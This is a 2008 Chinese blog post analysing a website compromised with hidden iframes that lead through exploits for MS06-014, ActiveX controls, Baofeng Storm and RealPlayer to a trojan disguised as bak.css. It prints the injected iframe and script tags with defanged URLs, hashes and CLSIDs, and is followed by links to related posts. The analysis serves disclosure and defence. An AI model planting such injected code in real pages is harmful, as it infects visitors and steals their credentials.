某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
endurer 原创
2008-02-29 第1版
1.网站首页包含代码:
/---
<iframe src=hxxp://pop**.i**ms**e*e*.cc/g3.htm width=100 height=0></iframe>
---/
1.1 hxxp://pop**.i**ms**e*e*.cc/g3.htm 包含代码:
/---
<iframe src=news.html width=100 height=0></iframe>
---/
1.1.1 hxxp://pop**.i**ms**e*e*.cc/news.html 输出代码:
/---
<script src=hxxp://x**x*x.c**ka**bc*.net/ms06014.js></script>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html"></iframe>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/StormII.html"></iframe>
<sCrIpT LAnGuAgE="jAvAsCrIpT" src=hxxp://x**x*x.c**ka**bc*.net/real.js></script>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/Thunder.html"></iframe>
---/
1.1.1.1 hxxp://x**x*x.c**ka**bc*.net/ms06014.js
利用 MS06-014漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
bak.css其实是一个PE格式的可执行文件
文件说明符 : D:/test/bak.css
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-29 12:15:9
修改时间 : 2008-2-29 12:15:9
访问时间 : 2008-2-29 12:15:49
大小 : 11504 字节 11.240 KB
MD5 : 17de1eca74664e197a5614762d072b19
SHA1: 56EC3173D9C98552628E3C24688F520B430AC610
CRC32: ee46ca17
Kaspersky 已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.sbg 文件: D:/test/bak.css/PE_Patch/UPack
瑞星报为:Trojan.Win32.Undef.dkp
1.1.1.2 hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html
利用 联众世界的游戏大厅主程序GLWorld所安装的ActiveX控件(HanGamePluginCn18.dll,CLSID:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.3 hxxp://x**x*x.c**ka**bc*.net/StormII.html
利用 暴风影音2 组件mps.dll(clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB)漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.4 hxxp://x**x*x.c**ka**bc*.net/real.js
利用 RealPlayer 漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.5 hxxp://x**x*x.c**ka**bc*.net/Thunder.html
内容空白
1.1.1.6 利用 BaiduBar.Tool 下载 hxxp://x**x*x.c**ka**bc*.net/Baidu.cab
Baidu.cab 中的 Baidu.exe 与 bak.css相同。
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg相关推荐
- 某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu endurer 原创 2008-09-29 第1版 发现了挺久了 ...
- 遭遇Worm.Win32.Viking,Worm.Win32f.ysv,Trojan.PSW.Win32.OnlineGames等
遭遇Worm.Win32.Viking,Worm.Win32f.ysv,Trojan.PSW.Win32.OnlineGames等 endurer 原创 2007-07-30 第1版 刚才," ...
- “千千静听”官方网站挂马(wxptdi.sys,msconkt.sys等***群的查杀)
作者:清新阳光 ( [url]http://hi.baidu.com/newcenturysun[/url] ) 日期:2007/12/22 (转载请保 ...
- 遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等2
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等2 endurer 原创 2007-08-1 ...
- 遭遇Trojan-Spy Win32 Delf uv Trojan PSW Win32 XYOnline Trojan
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等2 endurer 原创 2007-08-1 ...
- qqsafe病毒 arp网站挂马 原理剖析-786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org(转载)
昨天小站被挂马了,每次打开都会自动弹出一个对话框,提示正准备安装...,然后就消失.查看页面的源文件会发现在代码的最后面被加上了9 ~0 ]* U9 N2 ^ <body>" z ...
- 金山安全报告:二月漏洞频出 网站挂马猖獗
赚足眼球的"猫癣" 一款早在春节之前就已经发出预警的病毒,在大假结束后还是席卷了国内网络,无论称呼"猫癣"还是"犇牛",被电脑用户们牢牢记住 ...
- BT天堂网站挂马事件后续:“大灰狼”远控木马分析及幕后真凶调查
9月初安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序. 鉴于bt天堂电影下载网站访问量 ...
- 遭遇Win32.Loader.c,Trojan.PSW.Win32.GameOnline,Trojan.PSW.Win32.AskTao等1
遭遇Win32.Loader.c,Trojan.PSW.Win32.GameOnline,Trojan.PSW.Win32.AskTao等1 endurer 原创 2007-11-22 第1版 昨天中 ...
最新文章
- boot spring 对参数检测_【springboot】@Valid参数校验
- git切换到旧版本_github上怎么切换到某次提交?
- java8新特性之lambda表达式(及方法引用与构造器引用)
- 删除指定天数之前的日期文件夹
- ES6---箭头函数()={} 与function的区别(转载)
- video 微信 标签层级过高_什么是微信小程序二级分销系统?如何玩转?
- oracle 10g rac 包root.sh报错,案例:Oracle Rac root.sh报错 Failed to create keys in the OLR
- move_uploaded_file返回false但实际成功_023 Spring Boot 搭建实际项目开发框架
- 小爱同学,生命的意义是什么?
- 80套传统简历模板.zip
- 【Arduino】IIC 1602液晶屏显示
- 第四章第二节数据资产盘点-数据资产盘点方法伦
- ThinkPad蓝牙鼠标出现延迟、断开连接等问题的解决办法
- Mac下制作Linux Centos7启动盘
- 【Zotero】与坚果云配合使用同步失败解决方法
- 2月9日,30秒知全网,精选7个热点
- 英伟达RTX 4070 Ti显卡正式发布!你会买吗?
- 产量预测文献读后整理
- Linux通过wine运行QQ,Ubuntu安装wine运行QQ和微信
- 7-7 到底是不是太胖了